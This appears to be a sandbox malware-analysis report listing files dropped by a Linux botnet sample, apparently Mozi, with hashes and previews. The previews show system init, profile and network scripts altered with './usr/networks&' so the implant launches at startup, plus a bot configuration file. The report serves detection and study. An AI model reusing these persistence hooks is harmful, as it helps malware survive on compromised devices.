                                                                                                          • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                          • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: #!/bin/sh./usr/networks&.
                                                                                                          /etc/init.d/bootmisc.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):148
                                                                                                          Entropy (8bit):4.718194263525147
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4KXGK+R0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4GX+R0Voo+v7n
                                                                                                          MD5:68EC1ED64500D143FE44D1ED0B19DD83
                                                                                                          SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
                                                                                                          SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
                                                                                                          SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                          /etc/init.d/checkfs.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):147
                                                                                                          Entropy (8bit):4.7173471450646
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4AGXi0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4u0Voo+v7n
                                                                                                          MD5:FC904BF1583E7C4398FCCDF2D3276902
                                                                                                          SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
                                                                                                          SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
                                                                                                          SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                          /etc/init.d/checkroot-bootclean.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):250
                                                                                                          Entropy (8bit):4.872318043360431
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4YDi0Voo+v7n:AGKE3fdARMsBLbYerTn
                                                                                                          MD5:1B20C93FFEABBAA880FEB038394DA3EE
                                                                                                          SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
                                                                                                          SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
                                                                                                          SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                          /etc/init.d/checkroot.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3111
                                                                                                          Entropy (8bit):4.922960717312443
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:l+bjYLN1LiQKt6CYuSB/VN7pL4TyKWSmdrBW71cBi8m:0sxx2cJBVxZH01cc8m
                                                                                                          MD5:544D026D22E17EF8C1F59AE6EC1E5993
                                                                                                          SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
                                                                                                          SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
                                                                                                          SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
                                                                                                          /etc/init.d/hostname.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):404
                                                                                                          Entropy (8bit):5.01878905639229
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:U20zRSdZ9iBbG2Us4Ji0SAGKFqLkMfF3teoWpAsBdA80F4n0u4hR9QR0Voo+v7n:Ul221wi0PGKE3fdpsBi8wlbHaNrTn
                                                                                                          MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
                                                                                                          SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
                                                                                                          SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
                                                                                                          SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                          /etc/init.d/hwclock.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /etc/init.d/mountall-bootclean.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):249
                                                                                                          Entropy (8bit):4.8912088003487595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4iea2ii0Voo+v7n:AGKE3fdARMsBLbxPrTn
                                                                                                          MD5:11FEEF13321D348864E7632D0746ECA2
                                                                                                          SHA1:8D763DA6837280846D90AAACA3122D4F5CC0C62D
                                                                                                          SHA-256:3DFE238D111564682893276C28BB49367C38A1F07A873B8F79E4FA8291FD7FE7
                                                                                                          SHA-512:1C25B93B523688ACB3DF72B8EC148CD736CD479E7BEF3655DBCDB0B6D1AFACB652492ECF81A21EBADEBBFF14D0B20916DFD639E93EE1CCD6454C61F38BCAE46D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                          /etc/init.d/mountall.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):148
                                                                                                          Entropy (8bit):4.74526082342869
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4iLirKM0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4ierX0Voo+v7n
                                                                                                          MD5:44D9E997053B704B17DB7DD64563014E
                                                                                                          SHA1:1A29A3E927426D001FD0627C244B2397CF62D6C6
                                                                                                          SHA-256:56B70518A2C51841B3C7BC5DDBAFC2AF62F4A47B25A1147A929E1129CBCBFAC7
                                                                                                          SHA-512:B16AC50C36C5C17D405D2D8A1E9DB7D9863578EB71F4C382C56C4AA4BCEAEE6D4558A8CB94505464A1F13BA980741F5BE8CBD134C425004AA260DAC8F52B1581
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                          /etc/init.d/mountdevsubfs.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):56
                                                                                                          Entropy (8bit):4.1427249051134325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                          MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                          SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                          SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                          SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                          /etc/init.d/mountkernfs.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):56
                                                                                                          Entropy (8bit):4.1427249051134325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                          MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                          SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                          SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                          SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                          /etc/init.d/mountnfs-bootclean.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):249
                                                                                                          Entropy (8bit):4.8916208864241355
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4il/2ii0Voo+v7n:AGKE3fdARMsBLbPrTn
                                                                                                          MD5:515975B77B7985776BC03B8F5C029EFE
                                                                                                          SHA1:AA8F2AD5CB736EDC9BA0AEAE0748257E16875C11
                                                                                                          SHA-256:DFD458AE245B70CB759F3FF40FB22BDFD520E627DABAF813C1D9BCA2C8155E00
                                                                                                          SHA-512:169DC8DDF26C9F3A50C29D0F2AB99AF20D4F949F2F034AC25914086ED0DE37610D310F034E20B6493195E1BB54DC3036EB5BC999099D74ED53FFC813DED5FAD2
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountnfs-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                          /etc/init.d/mountnfs.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):190
                                                                                                          Entropy (8bit):3.788938232230384
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVx5jWvFFFvNsTREKdKCvFF/pN1uFFFveYd3LrLl7jWvFFFvzv3Hv0VOORgn:a5qvFFhNsTR/3/hN4/Zdd75qvFFhzfv7
                                                                                                          MD5:B09350F021B2B102B1E328A988261F3E
                                                                                                          SHA1:93AD761BD0E1EBB3E9BDCAA469EC0192C0C9DA4F
                                                                                                          SHA-256:E78EED19CCD5853AF3518FB3A16BE3244BE503798218041D65E5B44A0829A020
                                                                                                          SHA-512:1DB35C4F8A6584FAC6AB3B0789B4037F09557457B248443489D5EDD2A6B34DB59735B3256F905D45075199DD870E52FFDBCC7E8DD85006BD1F85F8000F61FF8A
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. exit 3. ;;. stop|status). # No-op. ;;. *). echo "Usage: $0 start|stop" >&2. exit 3. ;;.esac..:../usr/networks&.exit 1.
                                                                                                          /etc/init.d/umountnfs.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):145
                                                                                                          Entropy (8bit):4.730534942677594
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVaUsZ/ZHM4hWRJ7Fru4fR3dM0FJOUsZoG3Hv0VOORgn:eogJ7hu4pC0Voo+v7n
                                                                                                          MD5:60F4E3C6C61EF7FA36BC5B00FF234698
                                                                                                          SHA1:8AC881752B54BDB8FBD831A67AF6ED8CB2989B65
                                                                                                          SHA-256:9DBFF8DF724717101900B6289BDB73EB05D67D4A14170EB3D26B20686F851F7F
                                                                                                          SHA-512:741D35617E8C3B5D1278CB83C11BFBA1B6110B17D7E251DABA10EAC30BBAD8C5064F0EB7AF236EEEA9383E78C8E3F2DE477598763A5A1B7F213D606DF1F1D6D7
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 3..;;. stop|"")..do_stop..;;. *)..echo "Usage: umountnfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                          /etc/profile.d/Z97-byobu.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /etc/profile.d/apps-bin-path.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /etc/profile.d/bash_completion.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /etc/profile.d/cedilla-portuguese.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /etc/profile.d/vte-2.91.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /etc/rc.local
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOOR3n:M
                                                                                                          MD5:CCE237822A14795B1B5946EAE141691B
                                                                                                          SHA1:420CE3F920BB02962978255ADDCBF975D4014A3A
                                                                                                          SHA-256:D9C831E4480DBAAB813BF5BE1BCE6C64CFA4F4320038022E2051BD4E8E4D76DF
                                                                                                          SHA-512:24A86C9C9944068E3FE6000687E6D392F6587556601E09A22399D15B588536883547B326F13BE506BE492C2269F69AA2DCEDE4FBA8847664793847C74AD5EFF6
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 0.
                                                                                                          /etc/rcS.d/S95baby.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:POSIX shell script, ASCII text executable
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25
                                                                                                          Entropy (8bit):3.8936606896881854
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:TKH4v0VJ:hK
                                                                                                          MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                          SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                          SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                          SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                          Malicious:true
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                          • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                          • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                          • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                          • Filename: bad_file, Detection: malicious, Browse
                                                                                                          • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                          • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                          Preview: #!/bin/sh./usr/networks&.
                                                                                                          /etc/wpa_supplicant/action_wpa.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):714
                                                                                                          Entropy (8bit):5.329653855555143
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                                                                          MD5:DD099D71A60531087FDDED3EBEE8036A
                                                                                                          SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                                                                          SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                                                                          SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                                                          /etc/wpa_supplicant/functions.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /etc/wpa_supplicant/ifupdown.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3368
                                                                                                          Entropy (8bit):5.3288648372922625
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                                                                          MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                                                                          SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
                                                                                                          SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                                                                          SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                                                          /tmp/.config
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):284
                                                                                                          Entropy (8bit):4.841045283359712
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/JERaEtMFtbUrQQxXDzraOn3zuTTn/NL:AF+Ftb4HaU3zu8EF+Ftb4HaU3zuV
                                                                                                          MD5:1AB810C9212BB8053F4F725DF471AED5
                                                                                                          SHA1:25818035C48AD5FD30FF74125A38F7522C0B1AFA
                                                                                                          SHA-256:20AC9D8408C78F424C045419BEC511C90ADED7E9DFCEA1D26D704D18D1BA5C6E
                                                                                                          SHA-512:38F215233DBB733F014B31B9DBB8D40DD15AD61EDFB9F62D052F6ABD75A61A162F3298EDFAD9DC47B4DB330041E514AF5A666711FE12BEA8A2E0B5C1DCABC055
                                                                                                          Malicious:true
                                                                                                          Preview: 2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]32770.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]
                                                                                                          /usr/bin/gettext.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1914
                                                                                                          Entropy (8bit):4.829445473341419
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                                                          MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                                                          SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                                                          SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                                                          SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                                                          Malicious:true
